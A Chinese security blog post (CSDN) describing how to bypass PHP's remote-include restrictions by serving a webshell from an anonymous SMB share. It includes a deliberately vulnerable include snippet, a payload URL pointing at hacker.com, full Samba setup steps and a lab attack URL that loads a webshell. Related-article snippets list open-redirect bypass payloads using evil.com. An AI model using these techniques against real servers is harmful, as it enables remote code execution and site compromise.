RFI绕过URL包含限制getshell

最新推荐文章于 2024-06-20 20:30:56 发布
置顶 最新推荐文章于 2024-06-20 20:30:56 发布
阅读量1k 收藏 1
点赞数 3
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JBlock/article/details/90199481
版权
前言

为什么有今天这篇文章?原因是我在浏览Twitter时,发现关于远程文件包含RFI的一个奇淫技巧!值得记录一下,思路也很新奇!因为它打破我之前以为RFI已死的观点:)

正文
RFI引出

我们知道php最危险的漏洞函数类别之一就是文件包含类的函数,诸如include,include_once,require,require_once语句的时候,都会使用$_GET或者是其他未经过滤的变量,这就是一个主要的安全风险。

在PHP应用中,通常会有两个问题导致RFI漏洞。其中之一就是应用程序逻辑错误。这些漏洞产生的原因是本来应该被包含到另一个页面的文件并没有被包含,而是包含了其他文件。当这些文件独立执行时,就没有配置文件来指定这些变量的默认值,如果web应用配置不正确的话,用户就可以自己指定文件作为请求的一部分。

用一个最简单的例子来演示一下RFI

<?php
$file=$_GET['file'];
include($file);
?>

在上面的代码中,file参数从get请求中取值,并且是用户可控的值。file接收到参数值后直接带入到PHP文件中,没有经过任何处理。这样攻击者就可以发起相应的请求,从而让应用程序执行恶意脚本。例如,一个webshell如下:

http://example.com/?file=http://hacker.com/shell.php

通过这样操作,我们就可以远程包含一个shell,造成了RCE,但是这样操作有一个前提,要在php.ini中设置如下:

  • allow_url_fopen=on
  • allow_url_include=on

正常情况下,当这两个设置为off时,这个漏洞是不存在的!

另辟蹊径
PHP和SMB共享文件访问

在PHP配置文件中,“allow_url_include”包装器默认设置为“关闭”,指示PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。但是,即使“allow_url_include”和“allow_url_fopen”都设置为“Off”,PHP也不会阻止SMB URL加载。

攻击场景

当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP Web shell时,SMB共享应该允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何凭据,易受攻击的应用程序将包含Web shell的PHP代码。

首先我重新配置PHP环境并在php.ini文件中禁用“allow_url_fopen”以及“allow_url_include”。后来配置的SMB服务器具有匿名读访问权限。SMB共享准备就绪后,利用易受攻击的应用程序

PHP环境设置

首先我们要把被攻击主机的php.ini的“allow_url_fopen”和“allow_url_include”设置为“Off”

执行phpinfo查看配置是否成功

在继续之前,让我们确保当我们尝试访问受我们控制主机的Web shell时,PHP代码不允许远程文件包含

当我试图从远程主机包含PHP Web shell时,应用程序抛出错误并且没有发生RFI!

使用匿名读取访问权限配置SAMBA服务器(Linux)

使用下面的命令安装SAMBA服务器:

apt-get install samba

创建SMB共享目录:

  mkdir /var/www/html/pub/

配置新创建的SMB共享目录的权限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

运行以下提到的命令以删除SAMBA服务器配置文件的默认内容

echo > /etc/samba/smb.conf

将下面的内容放在’/etc/samba/smb.conf’文件中

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

重新启动SAMBA服务器以应用配置文件/etc/samba/smb.conf中的新配置

service smbd restart

成功重新启动SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不要求凭据。

在我的例子中,SAMBA服务器IP是192.168.23.129,我需要访问Windows文件浏览器中的SMB共享,如下:

 \\192.168.23.129\

在SMB服务器中共享PHP Web shell

在目录’/ var / www / html / pub’中共享PHP shell,这是SMB共享指令’ethan’的目录。

这里放了两个shell,一个一句话ant.php用来测试蚁剑连接,一个大马poc.php

接下我们开始攻击,首先包含poc.php执行我们的大马!

http://127.0.0.1:8888/rfi.php?file=\\192.168.23.129\ethan\poc.php

尝试蚁剑连接一句话!

Then, we get it!

后记

有时候我们会局限在传统安全思维的禁锢,导致我们的视线范围缩小了许多,因此,打破固有思维,才能发现意想不到的漏洞!

JBlock
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件包含getshell
qq_32445755的博客
04-11 312
简介 开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 allow_url_fopen = On(是否允许打开远程文件) allow_url_include = On(默认关闭,是否允许include/require远程文件)该选项为on便是允许 包含URL 对象文件等。 PHP版本<=5.2 可以使用%00进行截断。(能截断的php版本都小于5.3) PHP共有4个与文件包含相关的函数: inc
URL跳转绕过姿势
Berry2014的博客
04-04 621
POC "@" http://www.target.com/redirecturl=http://whitelist.com@evil.com "\" http://www.target.com/redirecturl=http://evil.com\a.whitelist.com "\\" http://www.target.com/redirecturl=http://evil.co...
CTF中文件包含漏洞总结
最新发布
qq_64395221的博客
06-20 1016
通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。
挖洞技巧:如何绕过URL限制
zhangge3663的博客
03-12 8520
大家对URL任意跳转都肯定了解,也知道他的危害,这里我就不细说了,过~ 大家遇到的肯定都是很多基于这样的跳转格式:http://www.xxx.xxx/xxx?xxx=http://www.xxx.xxx/xxxxx 基本的思路大家就是直接替换后面的URL来检测是否存在任意URL跳转,如果不存在,就直接返回到它自己的域名,如果存在,就跳转到你指定的URL。 这里我讲述我所知道的所以小点。 ...
web渗透测试----13、URL跳转漏洞
七天
06-23 3825
一、URL跳转 URL跳转一般分为两种,客户端跳转和服务端跳转,两种跳转对用户来说,都是指向或者跳转到另一个界面,页面发生了变化,但是对开发来说,其区别还是挺大的。 1、客户端跳转 客户端跳转也被称为URL重定向,用户浏览器的地址栏URL会发生明显变化,比如,当前页面为http://www.xxx.com/news.php,当点击登录按钮后,变成了http://www.xxx.com/login.php,且页面发生了变化,这就是客户端跳转。 比如:Index.jsp中 包含重定向语句 <% respo
文件包含漏洞三道题
qz362228的博客
05-04 1569
1.绕过require_once限制 题目页面: 有两个require_once,则this_is_flag.php已经被包含一次就不会再包含了。而题目意思就是说flag在this_is_flag.php文件中。所以要想绕过前面那个require_once,而执行后面那个。在浏览器中搜索绕过require_once限制 因为知道文件路径,所以最后是/www/html/file_include/Assess01/this_is_flag.php ?url=/proc/self/root/proc/self/r
使用SMB共享来绕过php远程文件包含限制执行RFI的利用
10-16
由于SMB共享是允许匿名访问的,PHP代码将成功加载并执行Web shell绕过了原本的远程文件包含限制。 总结起来,通过利用SMB共享,攻击者可以在PHP环境禁止远程HTTP/FTP文件包含的情况下,依然实现RFI攻击。这凸显了...
RFI整流原理阐释
01-20
输入级RFI整流灵敏度  模拟集成电路中有一种众所周知却又了解不深的现象,即RFI整流,在运算放大器和仪表放大器中尤为常见。放大极小信号时,这些器件可以对大幅度带外HF信号进行整流,即RFI.因此,除所需信号外,...
教你轻松完成EMI/RFI屏蔽!
07-17
电子设备制造商通常会采用电磁干扰(EMI) 和射频干扰(RFI)屏蔽措施保护敏感的数字电路免受外部幅射,同时也限制自身产品发出的潜在有害幅射。但这些制造商面临着满足EMI/RFI屏蔽要求的艰巨挑战,比如材料选择以及...
仪表放大器输入RFI保护.pdf
07-17
仪表放大器输入RFI保护,保护仪表放大器不受RFI影响。
文件包含原理解释-require
05-13
不恰当的文件包含可能导致远程文件包含漏洞(RFI,Remote File Inclusion),攻击者可以通过构造恶意URL包含远程服务器上的文件,甚至执行任意代码。因此,我们应该始终确保包含的文件路径是可信的,并避免用户...
关于“@”绕过地址的问题
baijunjie1的博客
02-22 923
前两天发现了一个漏洞,是关于一个网站登陆后的跳转; 我当前的网站登陆,有时候公司的其他的项目在登陆时也会使用,相当于一个公用的登陆页面;我们的网站登陆就是一般的账号密码验证码,然后请求后端,后端返回状态登陆成功,然后前端跳转页面;这里由于会有其他的项目会使用,那么就需要在登陆成功后跳转到他们的项目的首页,所以这里在登陆的URL后面会有一个参数 returnUrl=https://www.123.c...
URL跳转漏洞的一些常用绕过方法
Sys1em32 安全之路
12-13 2397
对各种绕过方法做一个汇总,方便自己使用查找。 https://aaa.com/xx?Url=http://www.test.com 文章中test为跳转网站示例,aaa为本身的域名 0x01.利用问号绕过 http://www.aaa.com/acb?Url=http://test.com?login.aaa.com test.com为你要跳转的域名,后面跟上网站自身的域名 0x0...
php 跳转到指定url_url跳转漏洞原理及绕过方式
weixin_39759989的博客
12-06 871
注:本文仅供学习参考0x01 url跳转原理及利用0x02 url跳转bypass0x03 url跳转修复0x01 url跳转原理及利用先走个流程说些废话,url重定向漏洞也称url任意跳转漏洞,网站信任了用户的输入导致恶意攻击,url重定向主要用来钓鱼,比如url跳转中最常见的跳转在登陆口,支付口,也就是一旦登陆将会跳转任意自己构造的网站,如果设置成自己的url则会造成钓鱼。来看个最典...
分享几个绕过URL跳转限制的思路
热门推荐
blotemj.blog.csdn.net
08-02 1万+
一直在学习我热爱的技术知识,这么多年来,我还从来没真正的写过一篇自己的原创文章,接触到了WEB安全方面,我也积累了一点点经验, 之前本来想大范围写下挖掘漏洞的各种思路,也是我这1年多所积累下来的经验,但是无奈,编写到一半我不小心点击了一个超链接, 导致大部分都无法恢复了,因为我第一次,也没注意保存,过了许久,我最终还是鼓起勇气来写这篇文章。整个过程我没有贴图片, ...
网络安全系列之三十 远程文件包含***
weixin_33928137的博客
11-08 252
远程文件包含***Remote File Include,它也属于是“代码注入”的一种,其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。文件包含漏洞可能出现在JSP、PHP、ASP等语言中,原理都是一样的,本文只介绍PHP文件包含漏洞。本次实验需要使用2台Web服务器,实验环境如下:Web1,IP地址192.168.80.129,利用NPMserv搭建php网站。Web2,IP地址192...
BUUCTF--[WMCTF2020]Make PHP Great Again
qq_46263951的博客
08-11 1081
进入页面后给出一段代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有一个require_once函数之前没有见过 require_once语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。 equire_once() 为了避免重复加载..
利用URL特性绕过域名白名单检测
CC's Blog
01-09 1万+
URL跳转漏洞主要是利用浏览器对URL特性的支持,绕过一些正则匹配不严谨的防护。
ctf从入门到放弃:文件包含漏洞190522
爱党人士
05-22 771
文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简洁,会使用“包含”函数功能。 比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上 一句<?php include fuction.php?>就可以调用函数代码。 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用 了“包含...
Web安全:远程文件包含(RFI)攻击详解与防范
攻击者可以通过构造特定的URL绕过应用程序设定的路径限制。 例如,假设存在这样一个易受攻击的URL:`/?path=...`,攻击者可以构造如下URL: `/?path=http://localhost/test/solution.php?/action/m_share.php` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值